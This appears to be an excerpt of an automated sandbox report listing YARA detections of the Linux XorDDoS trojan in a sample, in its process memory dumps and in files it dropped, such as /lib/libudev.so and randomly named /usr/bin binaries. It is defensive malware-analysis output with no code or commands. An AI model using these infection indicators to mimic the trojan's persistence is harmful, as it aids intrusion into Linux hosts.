Source: 10434.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10368.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10368.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10368.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10401.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10401.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10401.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10027.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10027.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10027.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: 10225.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Detects XORDDoS Author: ditekSHen
Source: 10225.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: 10225.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9451, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9454, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9457, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9462, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9552, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9563, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9574, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9585, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9596, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9607, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9618, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9629, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9640, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9651, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9662, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9673, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9684, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9695, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9706, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9717, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9728, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9739, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9750, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9761, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9772, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9783, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9794, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9805, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9816, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9827, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9838, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9849, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9860, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9871, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9882, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9893, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9904, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9915, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9926, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9937, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9948, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9959, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9970, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9981, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 9994, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 10005, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 10016, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 10027, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 10038, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 10049, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: Process Memory Space: iJl2Sb6qRa PID: 10060, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /lib/libudev.so, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /lib/libudev.so, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /lib/libudev.so, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/wzhmvohlxs, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/wzhmvohlxs, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/wzhmvohlxs, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/emnaztxelb, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/hiueshutol, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/hiueshutol, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/hiueshutol, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/mhvrcmaysv, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/mhvrcmaysv, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/mhvrcmaysv, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/lnmgbribvb, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/lnmgbribvb, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/lnmgbribvb, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/hgfzmygnbx, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/wdcujvrbpo, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/hgfzmygnbx, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/hgfzmygnbx, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/wdcujvrbpo, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/wdcujvrbpo, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/dezqblvxuy, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/dezqblvxuy, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/dezqblvxuy, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/chdmwyeiia, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/chdmwyeiia, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/chdmwyeiia, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/ckxgqrmzxa, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/ckxgqrmzxa, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/ckxgqrmzxa, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/lsodknzpps, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/lsodknzpps, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/lsodknzpps, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/eoqlmyvucn, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/eoqlmyvucn, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/eoqlmyvucn, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/cjfywultqo, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/cjfywultqo, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/cjfywultqo, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown
Source: /usr/bin/zbksjhrfms, type: DROPPED	Matched rule: Detects XORDDoS Author: ditekSHen
Source: /usr/bin/zbksjhrfms, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_2aef46a6 Author: unknown
Source: /usr/bin/zbksjhrfms, type: DROPPED	Matched rule: Linux_Trojan_Xorddos_884cab60 Author: unknown

Source: iJl2Sb6qRa, type: SAMPLE	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: iJl2Sb6qRa, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: iJl2Sb6qRa, type: SAMPLE	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9750.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9750.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9750.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10071.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10071.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10071.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10181.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10181.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10181.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10423.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10423.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10423.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9904.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9904.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9904.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10445.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10445.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10445.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10159.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10159.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10159.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9684.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9684.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9684.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10412.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10412.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 10412.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9761.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9761.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9761.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9838.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9838.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9838.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9607.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9607.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9607.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 9772.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 9772.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 9772.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 10148.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 10148.1.0000000008048000.00000000080cd000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
